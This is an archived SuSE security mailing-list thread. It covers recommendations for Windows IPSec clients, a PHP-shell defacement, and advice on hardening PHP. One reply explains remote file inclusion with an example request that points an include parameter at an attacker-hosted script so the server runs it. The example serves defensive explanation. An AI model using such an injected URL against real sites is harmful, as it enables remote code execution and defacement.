Freeswan client for Windows (2000/XP)?
Hi list, Can anyone recommend a good commercial Freeswan/IPSec client for Windows which copes well with multiple configurations e.g. remote IPSec connections using: Analog dial-up GSM/GPRS card Home broadband behind router/firewall WLAN behind router/firewall Have been using Marcus Mullers' ipsec.exe tool over the past year but end users are increasingly dissatisfied with it TIA Michael
Hello, what you need is ssh sentinel. It works great, and the cost are approx. 145 Euro's. With kind regards, Martin Temmink www.vrisned.com -----Original Message----- From: Michael Ryan [mailto:michael.ryan@storm.ie] Sent: vrijdag 5 december 2003 12:35 To: SuSE Security Subject: [suse-security] Freeswan client for Windows (2000/XP)? Hi list, Can anyone recommend a good commercial Freeswan/IPSec client for Windows which copes well with multiple configurations e.g. remote IPSec connections using: Analog dial-up GSM/GPRS card Home broadband behind router/firewall WLAN behind router/firewall Have been using Marcus Mullers' ipsec.exe tool over the past year but end users are increasingly dissatisfied with it TIA Michael -- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
Am Sonntag, 4. Januar 2004 13:21 schrieb Martin Temmink:
Hello, what you need is ssh sentinel. It works great, and the cost are approx. 145 Euro's.
With kind regards, Martin Temmink www.vrisned.com
Yes. That's probably the best. My customers use it and are fully content!
-----Original Message----- From: Michael Ryan [mailto:michael.ryan@storm.ie] Sent: vrijdag 5 december 2003 12:35 To: SuSE Security Subject: [suse-security] Freeswan client for Windows (2000/XP)?
Hi list,
Can anyone recommend a good commercial Freeswan/IPSec client for Windows which copes well with multiple configurations e.g. remote IPSec connections using:
Analog dial-up GSM/GPRS card Home broadband behind router/firewall WLAN behind router/firewall
Have been using Marcus Mullers' ipsec.exe tool over the past year but end users are increasingly dissatisfied with it
TIA
Michael
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
-- Mit freundlichen Grüßen Markus Feilner -- Linux Solutions, Training, Seminare und Workshops - auch Inhouse Feilner IT Linux & GIS Erlangerstr. 2 93059 Regensburg fon: +49 941 70 65 23 - mobil: +49 170 302 709 2 web: http://feilner-it.net mail: mfeilner@feilner-it.net
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello. I got a defacing in my domains this weekend. They used and php shell to run some processes in the machine and replace all index.(html|shtml|php). They changed my users password too, and let a process in the /tmp dir running on port 80. The thing is, if I turn on PHP Safe Mode, webmail and applications stop working (includes and execs). There's some way to secure PHP and don't lose half of it's funcionality? []s core - -- Jos? de Paula Eufr?sio J?nior Analista de Sistema | CPD ProInternet do Brasil -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2-rc1-SuSE (GNU/Linux) iD8DBQE/1bjNuux+hAffZfsRAnMGAJ4utuZmJ5mkK0wg5qaXQVAAyePLAwCfRKWR QKOI+DBUs9NYAKKnK/jv3tY= =TiPv -----END PGP SIGNATURE-----
Hello
I got a defacing in my domains this weekend. They used and php shell to run some processes in the machine and replace all index.(html|shtml|php). They changed my users password too, and let a process in the /tmp dir running on port 80.
What do you call the use of a php-shell?
The thing is, if I turn on PHP Safe Mode, webmail and applications stop working (includes and execs).
There's some way to secure PHP and don't lose half of it's funcionality?
Get more secure scripts (-; AFAIK there are just a few possibility to hack into a server by calling a php-script. The most common way (in fact a design-error of the developer) is, that a file to be included is passed as a parameter and someone replaces this value with an url. Example: You have php-script named displaypage.php that gets the page to be displayed as a parameter named "page". displaypage.pgp?page=main.php If someone changed the parameter to something like: displaypage.pgp?page=http://hackershelp.net/myscript.php the interpreter will load this file and will execute it as a php-script. The attacker is able to do everything possible for a php-script. You might be using a software that is known to have such an backdoor. I expirienced this once with phpnuke, a free portal-software written in php, that had this error too. The successfull attack has been published on a hackers-server in Argentinia that listed hundreds of other sites hacked by the use of the same backdoor. Whether the inclusion of remote files is allowed is defined by the option 'allow_url_fopen'. You might want to check this. Greetings -- 1 Bodo Kaelberer 123 http://www.webkind.de/ 3 4 Politik ist, wenn viele sich streiten und keiner sich freut.
Hello, Am 09. Dezember 2003 12:58 schrieb Jose de Paula Eufrásio Junior:
I got a defacing in my domains this weekend. They used and php shell to run some processes in the machine and replace all index.(html|shtml|php). They changed my users password too, and let a process in the /tmp dir running on port 80.
This doesn't sound like thinks that will run in safe mode ;-)
The thing is, if I turn on PHP Safe Mode, webmail and applications stop working (includes and execs).
This could have several reasons - see features.safe-mode.php in php documentation for details. Are there any warning messages inside your scripts (when you view them in a browser) or entries in /var/log/httpd/error.log?
There's some way to secure PHP and don't lose half of it's funcionality?
- use the open_basedir setting to restrict access to a given directory (i. e. the docroot). This also can be done per directory or per virtual host (see below) - set open_basedir and/or safe_mode per directory or per virtual host. Setup your PHP "secure" and then add to your httpd.conf <Directory /these/scripts/hate/safemode> php_admin_value safe_mode 0 php_admin_value open_basedir "/" </Directory> to disable safemode and open_basedir for a specific directory. - disable register_globals (and only enable it per directory if really necessary): php_value register_globals 1 This can also be done in a .htaccess, but requires AllowOverride Options (if the comment on php.net is correct ;-) Note: If you are running Confixx, register_globals for the Confixx directory is required :-( - if you have multiple users on your server, maybe using php as CGI (with Apache suExec) would be an option, but it has some disadvantages and some scripts won't run in CGI mode without modifikation [1] BTW:
gpgkeys: key BAEC7E8407DF65FB not found on keyserver (Or is is just a problem with my keyserver?)
Gruß Christian Boltz [1] Problems may occur with - header() (different syntax when setting HTTP status codes) - PHP Scripts used as "directories", i. e. index.php/param1/param2 (I like this way to pass parameters, but with CGI version it requires additional mod_rewrite rules :-( ) - other functions I didn't have problems with yet ;-) -- [ACPI] Du kannst da Deinen Power-Knopf konfigurieren wie Du willst. Du kannst den auch so konfigurieren, daß der PC anfängt zu singen ... [Ekkard Gerlach in suse-linux]
On Sun, 4 Jan 2004 13:21:59 +0100, "Martin Temmink" <temmink@vrisned.com> wrote: .... check you system date :)
participants (7)
-
Bodo Kaelberer
-
Christian Boltz
-
Jose de Paula Eufrásio Junior
-
Markus Feilner
-
Martin Temmink
-
Michael Ryan
-
mjt